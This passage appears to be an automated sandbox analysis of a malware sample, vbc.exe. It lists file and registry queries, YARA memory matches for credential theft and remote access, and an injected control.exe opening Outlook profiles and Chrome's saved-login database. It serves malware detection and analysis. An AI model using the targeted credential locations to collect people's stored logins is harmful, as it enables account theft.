Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY